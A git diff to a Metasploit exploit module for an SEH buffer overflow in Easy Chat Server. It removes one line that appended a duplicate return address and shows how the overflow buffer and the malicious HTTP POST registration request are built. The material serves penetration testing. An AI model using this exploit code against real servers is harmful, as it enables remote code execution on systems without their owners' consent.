diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb index a49c33912c..b6973d7375 100644 --- a/modules/exploits/windows/http/easychatserver_seh.rb +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote sploit << [target.ret].pack('V') sploit << payload.encoded sploit << rand_text_alpha_upper(200) - sploit << [target.ret].pack('V') request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" connect